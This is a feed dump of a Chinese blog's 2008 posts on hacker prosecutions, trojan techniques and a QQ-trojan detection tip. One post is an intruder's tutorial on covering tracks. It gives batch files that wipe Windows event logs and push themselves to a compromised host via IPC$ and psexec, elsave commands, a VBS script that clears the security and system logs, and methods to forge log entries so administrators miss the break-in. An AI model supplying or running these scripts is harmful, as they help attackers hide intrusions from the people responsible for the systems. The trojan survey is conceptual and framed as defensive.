  一方面国家加大投入不断的提高自身网络安全性加强各种立法,而一方面国内的各种黑客却犹如雨后春笋般的冒出,甚至形成了一道畸形的“黑色产业链”。随着冲击波和振荡波这种大危害病毒的浮现,随着病毒木马软件开始走向“商业化”,随着普通百姓也要面临QQ、邮箱、资料被盗,现在已经将网络视为生活一部分的大众才突然发现,用道德,用尊严,用民族,用那些所有无形的东西来约束一个利益,一个诱惑,甚至一个快感的无形人群的时候是那么的脆弱与软弱无力。 
  比如在2001年以前,国内的多数黑客网站都是均是纯粹探讨技术的安全站点,而今几乎百分之百的发展进化成为了“指导您狂刷Q币,让你无法查杀的病毒,盗取任何游戏QQ号码”的网络黑店,病毒在换成金钱,黑客技术成为商品大量贩卖已经极大的危害到了每一个网民的头上,仅仅腾讯公司的QQ号码申诉网页,每天就要处理成千上万条盗号的投诉,黑客已经越来越脱离了道德的底线,触动着刚刚修改的计算机犯罪法律条例的神经。根据问卷调查现实,很多网络黑客要么认为自己技术水平高超,警察不会抓到他,要么感觉自己的事情不会引起警察注意,更有甚者甚至认为网络无法律。 
  2004年底,随着公安部副部长白景富的一声令下,净化网络空间的战役的打响,公安部决定清理、打击利用互联网进行传播有害信息的违法犯罪活动;建立一套严格管理、有效防范、及时打击网上违法犯罪活动的长效机制。要通过各种专项行动,有效遏制境内互联网上犯罪的传播蔓延,增强互联网站的行业自律意识,促进互联网规范、有序、健康发展。 
  这样一个目标的实现,在中国当前的网络社会背景上,虽然不能完全依赖法律的打击,也不能全然仰仗对道德的期许,但法律最终将会成为高悬在病毒制造者和网络犯罪分子头上的达摩利斯之剑。 
  [专家说,徐某很可能被判处3~5年有期徒刑,他将成为中国历史上一个被判以重刑的网络黑客] 
  其他被判刑黑客链接: 
  浙江省首例“黑客”犯罪案今天一审宣判,被告人罗云彬被台州市椒江区法院以破坏计算机信息系统罪判处有期徒刑一年六个月,缓刑二年。 
  罗云彬1989年大学毕业后进入台州市黄岩电信局工作,后供职于中国联通台州公司。经法院认定,2001年6月,罗云彬从互联网上下载了有关扫描程序进行扫描,发现黄岩电信局的一台电脑正在上网。他即用其原来在黄岩电信局工作时获知的电脑密码成功登录该机,并将自编的程序拷贝至该电脑,使之成为侵入中国电信计算机系统的跳板机。此后,罗云彬多次通过该机非法登录台州电信计费数据库服务器,致使数据库崩溃,直接经济损失3.65万元。 
  在1997年,冰人作为一个黑客被捕,本来应该是一件极为轰动的事,出乎意料的是平静如水。如果说中国有最像凯文·米克尼克的人,那一定是冰人。冰人为什么被捕,到现在也没有人说得清楚,但是在我的印象中,冰人的主页上并没有太多特别的黑客软件,看不出他的水平到底有多高。据他自己说,他对无线电非常有研究,用一个旧对讲机,加一个5米长的铜丝就是截获模拟手机的密码,然后可以复制模拟移动电话。这一点更让人觉得冰人是一个像米克尼克那样的典型早期黑客。很快就听说了冰人被捕的消息。据说,罪名有三:盗用电话号码、出售黑客光盘、拥有黄色信息。网上当时有激烈的讨论,许多黑客都封掉自己的网站逃之夭夭。此后再也没有冰人的消息,有人说他去了新加坡,但是没有办法证实。 
法律链接: 

  1、计算机信息系统的含义 
  1994年2月18日,国务院发布的《中华人民共和国计算机信息系统安全保护条例》第2条作了如下规定: 
  本条例所称的计算机信息系统,是指由计算机及其相关的和配套的设备、设施(含网络)构成的,按照一定的应用目标和规则对信息进行采集、加工、存储、传输、检索等处理的人机系统。 
  2、计算机病毒的含义 
  1994年2月18日,国务院发布的《中华人民共和国计算机信息系统安全保护条例》第28条作了如下规定: 
  计算机病毒,是指编制或者在计算机程序中插入的破坏计算机功能或者毁坏数据,影响计算机使用,并能自我复制的一组计算机指令或者程序代码。 
  3、非法侵入计算机信息系统罪 
  《中华人民共和国刑法》第二百八十五条 违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机系统的,处三年以下有期徒刑或者拘役。 
  4、破坏计算机信息系统罪 
  《中华人民共和国刑法》第二百八十六条 违反国家规定,对计算机信息系统功能进行删除、修改、增加、干扰,造成计算机信息系统不能正常运行,后果严重的,处五年以下有期徒刑或者拘役;后果特别严重的,处五年以上有期徒刑。 
  违反国家规定,对计算机信息系统中存储、处理或者传输的数据和应用程序进行删除、修改、增加的操作,后果严重的,依照前款的规定处罚。 
  故意制作、传播计算机病毒等破坏性程序,影响计算机系统,后果严重的,依照第一款的规定处罚。 
  5、全国人民代表大会常务委员会《关于维护互联网安全的决定》2000.12.28) 
  一、为了保障互联网的运行安全,对有下列行为之一,构成犯罪的,依照刑法有关规定追究刑事责任: 
  (二)故意制作、传播计算机病毒等破坏性程序,攻击计算机系统及通信网络,致使计算机系统及通信网络遭受损害。 

]]> http://regsina.blog.163.com/blog/static/668274832008114851180 1 http://regsina.blog.163.com/blog/static/668274832008114851180 Thu, 14 Feb 2008 20:51:18 +0800 2008-02-14T20:51:18+08:00 <![CDATA[黑客技术]]> http://regsina.blog.163.com/blog/static/668274832008114846390 入侵系统成功后第一件事便是清除日志,擦去自己的形迹,这时可以用以下两个办法:一是自己编写批处理文件来解决,编写一个能清除日志的批处理非常简单,方法是:新建一个具有如下内容的批处理文件: 

@del c:\winnt\system32\logfiles\*.* 
@del c:\winnt\system32\config\*.evt 
@del c:\winnt\system32\dtclog\*.* 
@del c:\winnt\system32\*.log 
@del c:\winnt\system32\*.txt 
@del c:\winnt\*.txt 
@del c:\winnt\*.log 
@del c:\del.bat 

把上面的内容保存为del.bat备用。在上面的代码中echo是DOS下的回显命令,在它的前面加上“@”前缀字符,表示执行时本行在命令行或DOS里面不显示,另外del命令大家一定清楚吧?它是删除文件命令。 

接下来再新建一个批处理文件,内容如下: 

@copy del.bat \\%1\c$ 
@echo 向肉鸡复制本机的del.bat……OK 
@psexec \\%1 c:\del.bat 
@echo 在肉鸡上运行del.bat,清除日志文件……OK 

保存为clean.bat即可,假设已经与肉鸡进行了IPC连接,然后在CMD下输入:clean.bat 肉鸡IP,即可清除肉鸡上的日志文件。 

清除日志的另外一个方法是借助第三方软件,如著名黑客软件流光的开发者黑客小榕的elsave.exe,就是是一款可以远程清除系统日志、应用程序日志、安全日志的软件,大家可以在网上下载到。elsave.exe使用起来很简单,首先利用获得的管理员账号与对方建立IPC会话:net use \\ip pass /user: user,然后在命令行下执行如下命令:elsave -s \\ip -l application -C,这样就删除了安全日志。 


------------ 


1。日至清除 
一个入侵系统成功后的黑客第一件事便是清除日志,如果以图形界面远程控制对方机器或是从终端登陆进入,删除日志不是一件困难的事,由于日志虽然也是作为一种服务运行,但不同于http,ftp这样的服务,可以在命令行下先停止,再删除,在m命令行下用net stop eventlog是不能停止的,所以有人认为在命令行下删除日志是很困难的,实际上不是这样,下面介绍几种方法: 
1.借助第三方工具:如小榕的elsave.exe远程清除system,applicaton,security的软件,使用方法很简单,首先利用获得的管理员账号与对方建立ipc会话,net use \\ip pass /user: user 
然后命令行下:elsave -s \\ip -l application -C,这样就删除了安全日志。 
其实利用这个软件还可以进行备份日志,只要加一个参数 -f filename就可以了,在此不再详述。 
2.利用脚本编程中的VMI,也可以实现删除日志,首先获得object对象,然后利用其clearEventLog() 方法删除日志。源代码: 
cleanevent.vbs 
strComputer = "." 
Set objWMIService = GetObject("winmgmts:" _ 
& "{impers,(Backup)}!\\" & _ 
strComputer & "\root\cimv2") 
dim mylogs(3) 
mylogs(1)="application" 
mylogs(2)="system" 
mylogs(3)="security" 
for Each logs in mylogs 
Set colLogFiles = objWMIService.ExecQuery _ 
("Select * from Win32_NTEventLogFile where LogFileName='"&logs&"'") 
For Each objLogfile in colLogFiles 
objLogFile.ClearEventLog() 
Next 
next 
在上面的代码中,建立一个数组,为application,security,system如果还有其他日志也可以加入数组。 
然后用一个for 循环,删除数组中的每一个元素,即各个日志. 
2。创建日志: 
删除日志后,任何一个有头脑的管理员面对空空的日志,马上就会反应过来被入侵了,所以一个聪明的黑客的学会如何 
伪造日志: 
1。利用脚本编程中的eventlog方法是创造日志变得非常简单;下面看一个代码 
createlog.vbs 
set ws=wscript.createobject("Wscript.shell") 
ws.logevent 0 ,"write log success" '创建一个成功执行日志 
这个代码很容易阅读,首先获得wscript的一个shell对象,然后利用shell对象的logevent方法 
logevent的用法:logevent eventtype,"description" [,remote system] 
eventtype 为日志类型,可以使用的如下:0 代表成功执行,1 执行出错 ,2 警告 , 4,信息 ,8 成功审计 16 故障审计 
所以上面代码中,把0改为1,2,4,8,16均可,引号下的为日志描述。 
这种方法写的日志有一个缺点,只能写到应用程序日志,而且日至来源只能为wsh,即windows scripting host,所以不能起太多的隐蔽作用。 
2,微软为了方便系统管理员和程序员,在xp下有个新的命令行工具,eventcreate.exe,利用它,创建日志更加简单。 
eventcreate -s server -l logname -u username -p password -so source -t eventtype -id id -d description 
含义:-s 为远程主机创建日志: -u 远程主机的用户名 -p 远程主机的用户密码 
-l 日志;可以创建system和application 不能创建security日志, 
-so 日志来源,可以是任何日志 -t 日志类型 如information信息,error错误,warning 警告, 
-d 日志描述,可以是任意语句 -id 自主日志为1-1000之内 
例如,我们要本地创建一个系统日志,日至来源为admin,日志类型是警告,描述为"this is a test",事件ID为500 
可以用如下参数 
eventcreate -l system -so administrator -t warning -d "this is a test" -id 500]]> http://regsina.blog.163.com/blog/static/668274832008114846390 1 http://regsina.blog.163.com/blog/static/668274832008114846390 Thu, 14 Feb 2008 20:46:39 +0800 2008-02-14T20:46:39+08:00 <![CDATA[流行木马技术盘点]]> http://regsina.blog.163.com/blog/static/66827483200811351260 随着网络的发展,安全意识的提高,人们对木马程序的防范意识越来越强,防范方法和工具也越来越多,但是木马也一直在发展进化,各种木马技术层出不穷,下面Ex4rch就时下流行木马技术作一盘点,希望对大家了解和防范木马有所帮助。 
一.反弹端口技术
反弹端口原理:由木马服务端主动连接客户端,因此在互联网上可以访问到局域网里通过 NAT 代理(透明代理)上网的电脑,并且可以穿过防火墙(包括:包过滤型及代理型防火墙)。
防火墙对于连入的连接往往会进行非常严格的过滤,但是对于连出的连接却疏于防范。于是,与一般的木马相反,反弹端口型木马的服务端(被控制端)主动连接客户端(控制端),为了隐蔽起见,客户端的监听端口一般开在80(提供HTTP服务的端口),这样,即使用户使用端口扫描软件检查自己的端口,发现的也是类似TCP UserIP:1026 ControllerIP:80 ESTABLISHED 的情况,稍微疏忽一点,你就会以为是自己在浏览网页(防火墙也会这么认为的)。
国外的木马“Boinet”是最先实现这项技术的木马,它可以通过ICQ、IRC、HTTP(写入CGI编码)和反向主动连接这四种方式来联系客户端。(如图1)
国内最早实现反弹端口技术的木马非网络神偷莫属,而灰鸽子则是这项技术的集大成者,它内置FTP、域名、服务端主动连接(如图2)这三种服务端上线通知功能。在“服务端在线列表”里可以看到服务端的IP地址、地理位置、上线时间等信息一目了然。
二.木马进程注册为系统服务
传统木马主要通过修改启动组/注册表/autoexec.bat/win.ini/sysytem.ini/wininit.ini/*.inf(例如autorun.inf)/config.sys来实现自启动。
将木马进程注册为系统服务主要是利用了,在NT/2K/XP这些系统中,系统启动时会加载指定的服务程序,可避免传统的木马启动方式,并使木马进程更具迷惑性。郁闷的是黑客使用的工具居然来自MS Windows2000 Resource Kits.(如图3、4)


三.无进程、无端口的DLL(动态链接库)木马
这种木马涉及比较高深的编程技术(Windows Socket 2 SPI技术),在此,Ex4rch只能简单地介绍一下它的实现原理。所谓的无进程实际上是将DLL木马,注入到其它EXE文件中,使其成为木马的合法载体。(一般黑客会选择Explorer.exe、Svchost.exe等系统关键性服务程序,这样用户就很难终止木马的运行)。而所谓的无端口,实际上是重复利用了机器已经打开的端口(如80、135,139等常用端口)来传送数据,这样就避免了开新端口,也能骗过防火墙。并且这样的端口复用是在保证端口默认服务正常工作的条件下进行复用,这是它区别于端口劫持的地方。
四.三(多)线程技术
在操作系统中,进程是存储器、外设等资源的分配单位,同时也是处理器调度的对象,为提高进程内的并发性,Windows中引入了线程的概念,一个进程可以同时拥有多个并发线程。顾名思义,三线程就是指一个木马进程开启了三个线程,其中一个为主线程,负责远程控制的工作。另外两个为辅助线程,其中一个辅助线程称为监视线程,它负责检查木马程序是否被删除和是否被停止自启动,举例而言,一般木马侵入一台电脑后会创建一个备份文件,并在注册表中添加键值,以实现自启动。这个监视线程会定时检查木马程序和注册表中的键值是否存在,如果不存在则使用备份文件恢复木马,并向注册表添加自启动键值。另外一个辅助线程称为守护线程,它驻留在别的EXE文件内,与木马进程同步,一旦木马进程被停止,它就会重新启动该木马,并将自身数据赋给它,类似断点续传,这样就能保证木马程序一直运行。很显然这种木马技术是受了蠕虫病毒“中国黑客”的启发。

五.无客户端木马
这类木马实际上是一个加强版的后门程序,一般被安装在防范薄弱的服务器(俗称“肉鸡”)上,所谓无客户端是指几乎任何和网路相关的程序都可以用来控制他,如Telnet,sterm,IE,Flashget,Cuteftp……由于没有客户端,你甚至可以跨平台控制,你可以登陆上Unix,linux主机,甚至某台路由器,telnet,Ftp命令就可以对服务端进行控制管理,只要黑客高兴,Macos,也可以成为他的客户端控制平台,随着网络的普及不少用户已经实现固定IP上网,对这类木马(如蓝色火焰和winshell等)的防范意识亦应有所提高。
Ex4rch 在写这篇文章时用最新版的诺顿和金山毒霸来检查文中提及的木马程序,除网络神偷外,其他木马都安全过关,这实际上证明了用户及其防范工具在不断发展的木马面前是滞后的、被动的。所以,我们在使用各种工具安全来防范木马的同时,还应进一步提高自身的安全意识,养成良好的上网习惯。]]> http://regsina.blog.163.com/blog/static/66827483200811351260 2 http://regsina.blog.163.com/blog/static/66827483200811351260 Wed, 13 Feb 2008 17:12:06 +0800 2008-02-13T17:12:06+08:00 <![CDATA[只要3秒! 快速判断电脑是否中了QQ木马]]> http://regsina.blog.163.com/blog/static/668274832008113510350  QQ木马的危害就不必多说了,现在QQ2007正式版已经推出,自诩在安全性上有了很大的保障。不过通过笔者前期的测试表明其安全性并不能让人信服,大家可以参看文章:QQ2007正式版竟无法抵御2005年木马。    对于在网吧上网的用户更是危机四伏,没有了杀毒软件的保护,再加上属于公用电脑,如果想上QQ还真怕被盗走。这里有一个小技巧与大家分享,可以快速辨别绝大多数的QQ木马。
    大家都知道QQ键盘加密技术吧。用户登录的时候,通过加载npkcrypt.sys驱动实现保护,当然npkcrypt.dll和npkcrypt.vxd文件也不可或缺。这样做实际上是修改了Windows的驱动机制,造成无法用粘贴方式输入密码。
    而QQ木马要实现QQ密码的截取,首先要破坏掉这个文件(因为它需要在用户输入密码时进行监听,这样才能有效的获得QQ密码)。当npkcrypt.sys被破坏的情况下,QQ登录窗口依然能启动,但在输入的密码框里就会出现一把坏的锁。可是现在的木马会利用各种手段进行伪装。能够对这把坏锁进行修复。但不管如何修复,QQ密码框都可以用Ctrl+V粘贴密码。
    通过这个原理,我们可以在输入QQ密码时先随意复制一些字符串,然后在密码框按下Ctrl+V。如果不能贴粘,则可判断基本上是没有QQ木马的,反之就要注意了。这个方法非常快捷方便,在一些条件有限的场合使用还是很有效果的。
    特别提示:虽然该方法可以完成大部分QQ木马的判断,但木马的“快速发展”还是不能让此法保证QQ安全。用户最好还是在相对安全的环境下运行QQ,另外QQ申诉和密码保护是找回密码的最好方式,相关的信息应该牢记。


]]> http://regsina.blog.163.com/blog/static/668274832008113510350 2 http://regsina.blog.163.com/blog/static/668274832008113510350 Wed, 13 Feb 2008 17:10:35 +0800 2008-02-13T17:10:35+08:00